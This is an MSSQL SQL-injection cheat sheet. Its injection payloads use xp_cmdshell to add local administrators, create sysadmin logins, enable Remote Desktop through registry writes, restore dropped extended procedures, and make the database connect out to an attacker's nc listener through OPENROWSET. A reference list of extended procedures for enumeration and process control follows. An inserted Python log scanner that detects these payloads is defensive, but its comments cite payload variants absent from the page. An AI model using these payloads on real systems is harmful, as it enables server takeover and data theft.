Frequently Used commands for MSSQL Injection

Source: Internet
Author: User

① Check whether xp_cmdshell exists

and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')

② Run a command with xp_cmdshell

;exec master..xp_cmdshell 'net user name password /add'--
;exec master..xp_cmdshell 'net localgroup administrators name /add'--

③ Check privileges

and (select is_srvrolemember('sysadmin'))=1--    // sa (sysadmin)
and (select is_member('db_owner'))=1--           // dbo
and (select is_member('public'))=1--             // public

④ Create a login on MSSQL

;exec master.dbo.sp_addlogin name,pass;--

⑤ Promote the new login to sysadmin

;exec master.dbo.sp_addsrvrolemember name,sysadmin;--

⑥ Open 3389 (Terminal Services)

;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE' exec master..xp_regwrite @r,'Software\Microsoft\Windows\CurrentVersion\netcache','enable','REG_SZ','0';--
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE' exec master..xp_regwrite @r,'Software\Microsoft\Windows NT\CurrentVersion\Winlogon','ShutdownWithoutLogon','REG_SZ','0';--
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE' exec master..xp_regwrite @r,'Software\Policies\Microsoft\Windows\Installer','EnableAdminTSRemote','REG_DWORD',1;--

;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE' exec master..xp_regwrite @r,'System\CurrentControlSet\Control\Terminal Server','TSEnabled','REG_DWORD',1;--
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE' exec master..xp_regwrite @r,'System\CurrentControlSet\Services\TermDD','Start','REG_DWORD',2;--

;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE' exec master..xp_regwrite @r,'System\CurrentControlSet\Services\TermService','Start','REG_DWORD',2;--

;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE' exec master..xp_regwrite 'HKEY_USERS','.DEFAULT\Keyboard Layout\Toggle','Hotkey','REG_SZ','1';--
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE' exec master..xp_cmdshell 'iisreset /reboot';--

⑦ Remove and restore xp_cmdshell

1. Remove xp_cmdshell
Drop the xp_cmdshell extended stored procedure:
exec sp_dropextendedproc 'xp_cmdshell'

2. Restore xp_cmdshell
exec sp_addextendedproc xp_cmdshell, @dllname='xplog70.dll'

exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'; select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
If the query returns 1, the restore worked;

otherwise, upload xplog70.dll to c:\inetpub\web\ and register it by its full path:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\web\xplog70.dll';--

3. If the procedures were removed with
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

restore them with
dbcc addextendedproc ('sp_oacreate','odsole70.dll')
dbcc addextendedproc ('xp_cmdshell','xplog70.dll')
This restores them directly and does not depend on whether sp_addextendedproc still exists.

Obtaining the database server's IP address when the web server and the MSSQL database server are separate (requires db permissions)

1. Listen locally with nc: nc -vvlp 80

2. Make the database server connect out to the listener; its source IP shows up in nc:
insert into openrowset('sqloledb','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=<your IP>,80;','select * from dest_table') select * from src_table;--
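As an added defensive example (not from the original sheet), the following Python normalizes URL-encoded query strings and flags the payload families listed above (xp_cmdshell checks and calls, xp_reg* writes, sp_addextendedproc restores, is_srvrolemember probes, sp_addlogin/sp_addsrvrolemember, the OPENROWSET connect-back) in web access logs. The signature names and the sample log lines are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Signature name -> regex run against the normalized query string.
SIGNATURES = {
    "xp_cmdshell": re.compile(r"xp_cmdshell"),
    "registry_xp": re.compile(r"xp_reg(write|read|delete\w+|enum\w+|\w*multistring)"),
    "xp_restore": re.compile(r"(sp_addextendedproc|dbcc addextendedproc)"),
    "priv_probe": re.compile(r"(is_srvrolemember|is_member)\("),
    "login_creation": re.compile(r"sp_add(login|srvrolemember)"),
    "openrowset_exfil": re.compile(r"openrowset\('sqloledb'"),
    "fs_enum": re.compile(r"xp_(dirtree|subdirs|fixeddrives|getfiledetails)"),
    "xp_existence_check": re.compile(r"sysobjects where xtype='x'"),
}

def normalize(query: str) -> str:
    """URL-decode twice (double encoding), lowercase, strip [] quoting and
    squeeze whitespace around '.', '(', '=' and ',' so that the spaced-out
    forms on this page ("Master .. xp_regwrite", "count (*)") match one pattern."""
    s = unquote_plus(unquote_plus(query)).lower()
    s = s.replace("[", "").replace("]", "")
    s = re.sub(r"\s*([.(=,])\s*", r"\1", s)
    return re.sub(r"\s+", " ", s).strip()

def scan_line(line: str) -> list[str]:
    """Return the signature names that fire on one combined-format log line."""
    m = re.search(r'"(?:GET|POST) (\S+)', line)
    if not m or "?" not in m.group(1):
        return []
    norm = normalize(m.group(1).split("?", 1)[1])
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]

def scan_log(lines: list[str]) -> dict[int, list[str]]:
    """Map 1-based line number -> hits, for lines with at least one hit."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := scan_line(line))}

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /news.asp?id=1%20and%201%20%3D%20(select%20count%20(*)'
    '%20from%20Master.%20DBO.%20sysobjects%20where%20xtype%20%3D%20%27X%27%20and%20name%20%3D%20%27xp_cmdshell%27) HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.asp?id=1%3B%20Exec%20master%20..%20xp_cmdshell%20%27net%20user%20x%20x%20/add%27-- HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /news.asp?id=1;insert%20into%20OpenRowSet(%27sqloledb%27,%27uid=sa;pwd=x;Network=dbmssocn;address=10.0.0.9,80;%27,%27select%20*%20from%20t%27)%20select%20*%20from%20users-- HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(hits)}")
```

The normalizer is what matters: the sheet's own variants ("Master .. xp_regwrite", "[Master].[DBO].[xp_subdirs]", "count (*)") all collapse to a single form before the signatures run.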

 

MSSQL extended stored procedures

-- Get the MSSQL version
exec master..sp_msgetversion    // dbo, public

-- Get hard disk file information    // dbo, public
-- Parameters: directory name, directory depth, whether to list files    // reads disk directories and files
exec master..xp_dirtree 'c:\'          // list all directories and subdirectories under c:\
exec master..xp_dirtree 'c:\',1        // list only the folders directly under c:\
exec master..xp_dirtree 'c:\',1,1      // list the folders and files directly under c:\

-- List all Windows local groups on the server
exec master..xp_enumgroups    // dbo

-- Get the computer name of the current SQL Server
exec master..xp_getnetname    // dbo, public

-- List all subdirectories under a specified directory
exec [master].[dbo].[xp_subdirs] 'c:\winnt'    // lists directories

-- List the fixed drives on the server and the free space on each
exec master..xp_fixeddrives    // dbo, public

-- Show the available drive letters on the system
exec master..xp_availablemedia    // dbo

-- Get the attributes of a file
exec master..xp_getfiledetails 'c:\1.txt'    // dbo, public

-- Space statistics for every table in the database
exec sp_msforeachtable 'sp_spaceused ''?'''    // dbo, public

-- Record count and size of every table
exec sp_msforeachtable 'select ''?''','?','sp_spaceused ''?''','select count(*) from ?'    // dbo, public

-- Update null values in the note column of table1/table2 (set them to an empty string)
exec sp_msforeachtable @command1='update ? set note='''' where note is null', @whereand='and o.name in (''table1'',''table2'')'

-- List the server's domain names
exec master..xp_ntsec_enumdomains    // machine name // dbo, public

-- Stop or start a service
exec master..xp_servicecontrol 'stop','schedule'    // schedule is the service name // dbo

-- Kill a running program by PID
exec master..xp_terminate_process 123    // 123 is the PID // dbo

-- List only the subdirectories of a directory
exec master.dbo.xp_subdirs 'c:\'    // dbo

-- Server security (authentication) mode information
exec master..xp_loginconfig    // dbo

-- Registry extended stored procedures
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite

-- Register a new extended stored procedure with Microsoft SQL Server
exec sp_addextendedproc xp_cmdshell, @dllname='xplog70.dll'    // restore xp_cmdshell

The restore procedure sp_addextendedproc is defined as follows:
create procedure sp_addextendedproc --- 1996/08/30 20:13
    @functname nvarchar(517),   /* (owner.)name of function to call */
    @dllname   varchar(255)     /* name of DLL containing function */
as
    set implicit_transactions off
    if @@trancount > 0
    begin
        raiserror(15002,-1,-1,'sp_addextendedproc')
        return (1)
    end
    dbcc addextendedproc (@functname, @dllname)
    return (0) -- sp_addextendedproc

Create a new Microsoft SQL Server login with sp_addlogin    // only members of the sysadmin and securityadmin fixed server roles can execute sp_addlogin.

Patch version
A build number such as 8.00.760 denotes the SQL Server version and patch level; the mapping is:

8.00.194 ------- SQL Server 2000 RTM
8.00.384 ------- SP1
8.00.534 ------- SP2
8.00.760 ------- SP3
